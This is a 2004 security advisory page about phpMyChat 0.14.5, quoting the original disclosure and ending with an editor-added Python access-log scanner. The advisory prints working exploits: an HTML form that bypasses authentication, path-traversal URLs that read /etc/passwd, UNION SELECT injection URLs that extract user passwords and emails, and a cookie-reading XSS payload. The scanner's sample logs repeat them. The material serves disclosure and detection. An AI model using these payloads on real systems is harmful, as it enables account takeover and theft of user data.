SecurityTracker.com
SecurityTracker
Archives
Category:  Application (Instant Messaging/IRC/Chat) > phpMyChat
Vendors:  phpHeaven
phpMyChat Grants Administrative Access to Remote Users and Has Other Flaws
SecurityTracker Alert ID:  1010515
SecurityTracker URL:  http://securitytracker.com/id/1010515
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jun 17 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.14.5
Description:   Several vulnerabilities were reported in phpMyChat. A remote user can gain administrative access to the application. A remote user can also inject SQL commands and conduct cross-site scripting attacks. A remote authenticated administrator can view files on the target system.

HEX reported that 'lib/login.lib.php3' and 'admin/adminBody.php3' contain several flaws.

It is reported that a remote user can send a specially crafted HTML form value (do_not_login="false") to the 'chat/edituser.php3' to gain administrative access to the system.

It is also reported that a remote authenticated administrator (or a remote user that has exploited the above listed flaw) can view files and directories on the target system. The remote authenticated administrator can supply a specially crafted filename for the 'sheet' variable in 'admin.php3'. Some demonstration exploit URLs are provided:
http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/
http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&s

It is also reported that the 'input.php3' script does not properly validate user-supplied input in the 'C' variable. A remote user can create specially crafted input that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the phpMyChat software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

It is also reported that a remote user can inject SQL commands via the 'usersL.php3' script because many variables are not properly validated, including $sortBy, $sortOrder, $startReg, $U, $LastCheck, and others. Some demonstration exploit URLs are provided:

http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*

Impact:   A remote user can gain administrative access to the application.

A remote user can inject SQL commands.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the phpMyChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote authenticated administrator can view arbitrary files on the target system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpheaven.net/projects/phpmychat/rubrique4.html
Cause:   Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  phpMyChat 0.14.5


Information :
Language : PHP
Bugged Version : phpMyChat ver. 0.14.5 (and less ?)
Patched version : none
Website : http://www.phpheaven.net/
Problems : Permanent XSS, authorization bypass, SQL-injection, include (read) files.

Objects :
- lib/login.lib.php3
- admin/adminBody.php3
and more ...

Exploits :
1) For unauthorized login one only needs to send one additional variable: do_not_login="false"

   Example:
   <HTML>

   <HEAD>
   <TITLE>phpMyChat exploit</TITLE>
   </HEAD>

   <BODY>
   <FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
   <INPUT type="hidden" name="FORM_SEND" value="1">
   <INPUT type="hidden" name="AUTH_USERNAME" value="admin">
   <INPUT type="hidden" name="AUTH_PASSWORD" value="null">
   <!-- INSERT -->
   <INPUT type="hidden" name="do_not_login" value="false">
   <!-- END INSERT -->
   <INPUT TYPE="hidden" NAME="L" VALUE="russian">
   <INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR>
   <INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR>
   <INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR>
   <INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR>
   <INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR>
   <INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR>
   <INPUT TYPE="text" NAME="EMAIL" VALUE="you@email.ru">
   <INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR>
   <INPUT TYPE="submit" NAME="submit_type" VALUE="Change">
   </FORM>
   </BODY>

   </HTML>
   
2) To read files one needs to have administrator rights (read above for how to get them)!
   
   Variables "sheet" and "What" are not filtered:
   require("./admin/admin${sheet}.php3");
   and
   if (isset($What) && $What != "") include("./admin/admin".$What.".php3");
   
   Example:
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00
   and
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=1

3) Cross-Site Scripting aka XSS
   In the input.php3 form there is a variable "C", in which the color of messages is transferred.
   
   Example:
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\">[CODE]">
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \"">
   
4) A great number of variables aren't filtered:
   $sortBy, $sortOrder, $startReg, $U, $LastCheck and more ...
   Example SQL-injection:
   http://[TARGET]/chat/usersL.php3?L=russian&R='[SQL]
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*

Patch/More Details :
Waiting for the patch at http://www.phpheaven.net/


[ Copyright by [HEX] | mailto:hex(a)hex.net.ru ]
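A detection-side example added by the editor; it is not part of the advisory or of phpMyChat. It scans Apache-style access-log lines for the four request patterns the advisory describes (do_not_login=false sent to edituser.php3, a NUL byte or traversal in the sheet/What parameters of admin.php3, UNION SELECT in usersL.php3 parameters, and markup in the C parameter of input.php3). The log lines are constructed; the script and parameter names are the ones the advisory gives.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory). Request paths
# mirror the parameter patterns the advisory describes; the last line is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jun/2004:10:01:02 +0000] "GET /chat/edituser.php3?FORM_SEND=1&AUTH_USERNAME=admin&do_not_login=false&U=admin HTTP/1.0" 200 512
10.0.0.6 - - [17/Jun/2004:10:02:10 +0000] "GET /chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=x&sheet=/../../../../etc/passwd%00 HTTP/1.0" 200 2048
10.0.0.7 - - [17/Jun/2004:10:03:30 +0000] "GET /chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20c_reg_users%20/* HTTP/1.0" 200 900
10.0.0.8 - - [17/Jun/2004:10:04:00 +0000] "GET /chat/input.php3?C=%23FF0000%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 300
10.0.0.9 - - [17/Jun/2004:10:05:00 +0000] "GET /chat/admin.php3?From=admin.php3&What=Body&L=russian&sheet=Body HTTP/1.0" 200 700
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
SQLI_RE = re.compile(r"union\s+select|/\*|'\s*or\b", re.IGNORECASE)

def classify(request_path):
    """Map one request path (with query string) to the advisory's findings; empty list if clean."""
    parts = urlsplit(request_path)
    script = parts.path.rsplit('/', 1)[-1]
    # parse_qs percent-decodes values, so %00 becomes a literal NUL byte here
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    findings = []
    if script == 'edituser.php3' and params.get('do_not_login', '').lower() == 'false':
        findings.append('auth-bypass: do_not_login=false')
    if script == 'admin.php3':
        for key in ('sheet', 'What'):
            val = params.get(key, '')
            if '\x00' in val or '..' in val or '/' in val:
                findings.append(f'file-inclusion: {key}')
    if script == 'usersL.php3':
        for key, val in params.items():
            if SQLI_RE.search(val):
                findings.append(f'sql-injection: {key}')
    if script == 'input.php3' and re.search(r'[<>"\']', params.get('C', '')):
        findings.append('xss: C')
    return findings

def scan_log(text):
    """Return (client_ip, script_path, findings) for every request that matched a rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        findings = classify(m.group(2))
        if findings:
            hits.append((m.group(1), m.group(2).split('?')[0], findings))
    return hits
```

Feeding a real access log through scan_log() gives one tuple per matching request; the benign fifth sample line produces no hit, so plain admin use of sheet=Body is not flagged.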
